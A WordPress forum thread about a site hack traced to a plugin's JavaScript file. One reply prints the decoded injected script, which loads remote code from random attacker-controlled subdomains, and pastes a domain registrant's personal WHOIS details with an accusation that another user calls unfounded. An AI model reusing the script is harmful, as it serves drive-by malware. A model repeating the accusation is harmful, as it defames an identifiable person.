sexybookmarks seen as malware?

  • Resolved mutedgirl

    (@mutedgirl)


    14 years, 4 months ago

    So something very strange. Several people contacted me, saying that my blog was giving them malware warnings. I did the usual routine- checked my theme files, ran the Exploit scanner plugin, checked the site myself (no message or warning for me) and nothing was out of the ordinary. The other weird thing is that some people said they only got the message some of the time- other times, it was fine.

    I had a visitor take a screenshot of what she was seeing.

    click to view screenshot

    As you can see, it lists sexybookmarks.js as the culprit. HUH? I checked the plugin files and nothing has been modified (and I’ve been using this plugin for months now with no issues) I deactivated the plugin and had her check again and she no longer gets the warning.

    So! My question: is anyone else noticing this behavior?? It’s possible that it’s just something unique to different virus monitoring software (which would explain why some people see the warning, others don’t) I did some Google searching but this doesn’t seem to be a widespread thing… very very curious!

Viewing 7 replies - 1 through 7 (of 7 total)

  • Thats very worrying and a method used by some unscrupulous coders to serve spam server side. I’m not saying this is the intention of this particular plugin but having upgraded i have encountered a few issues with WP 3 and seriously thinking of going back a version and ripping out the admin call back so I dont get the upgrade notices which to be honest I’m always trying to find any worthwhile difference afterwards.

    @mutedgirl:

    Indeed very curious. I can assure you that the plugin contains absolutely NO malware, spam, or anything else even remotely dangerous in it’s initial packaging…

    However, after taking a look at your file… It does seem that you’ve been hacked. Take a look at the following file:
    https://jayesel.net/wp-content/plugins/sexybookmarks/js/sexy-bookmarks-public.js

    You’ll notice the long string of garbled JS at the beginning, followed by the normal JS which comes with the plugin. It looks as though someone has hacked your server and appended some JS to your public javascript file included with SB.

    You can download the plugin again directly from wp.org and you’ll notice that the JS file does not include what you have in your JS file.

    Thread Starter mutedgirl

    (@mutedgirl)

    I actually found a similar hack in another plugin as well (multiple column blogroll widget) That one was causing only some people to get the error, I think, because it displays links at random, 10 or so at a time (so only some of the time was the offending code being used/displayed) I removed that as well and so far, things seem quiet.

    I’m glad it’s not the actual plugin for sexybookmarks, because I really like that one ?? I’ve changed passwords etc and I’m going to see if things stay clean, then start adding back in the stuff I removed while testing.

    Thanks for your response! This malware stuff is ridiculous!

    I agree, malware and spam is getting to be even more of a ridiculous nuisance now than it ever has been.

    Also, just for your info… The garbled script that someone put into the public js file for sexybookmarks decoded into the following:

    <script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="https://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

    So I’m assuming the owners of:

    edisonsnightclub.com,
    gaindirectory.org,
    ideacoreportal.com,
    and
    karenegren.com

    are the perpetrators behind it.

    Registrant:
   IDEACore LLC
   22552 King Richard Ct.
   Beverly Hills, Michigan 48025
   United States

   Domain Name: IDEACOREPORTAL.COM
      Created on: 14-Jan-05
      Expires on: 14-Jan-11
      Last Updated on: 15-Jan-10

   Administrative Contact:
      Craig, Joseph
      IDEACore LLC
      22552 King Richard Ct.
      Beverly Hills, Michigan 48025
      United States
      2484333380      Fax -- 

   Technical Contact:
      Craig, Joseph
      IDEACore LLC
      22552 King Richard Ct.
      Beverly Hills, Michigan 48025
      United States
      2484333380      Fax -- 

   Domain servers in listed order:
      NS51.DOMAINCONTROL.COM
      NS52.DOMAINCONTROL.COM

    These assumptions are all wrong, it’s an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not the “perpetrators” as per Josh, nor was it likely that the originating poster was.

    The Phoenix Exploit in kit has been implicated in issues in the realm of these posts.

    It’s not a good idea or fair to publish the data above when you’re not certain about the facts, as erroneous information defames the parties.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains don’t show any involvement with this attack and are clean.

    Sahaskatta and Josh Jones, to be most accurate and fair, you should remove these errant publications of opinions/assumptions about the domains and registrants.

    @simka:

    As I mentioned above, that was only an assumption. I’m not a hacker, nor do I know much about hacking at all… I simply made an assumption based on the facts I saw, which was that those domains were being flaunted in the hack.

    At any rate, it’s been far too long since this post was created so I can’t edit/remove my response.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘sexybookmarks seen as malware?’ is closed to new replies.

Tags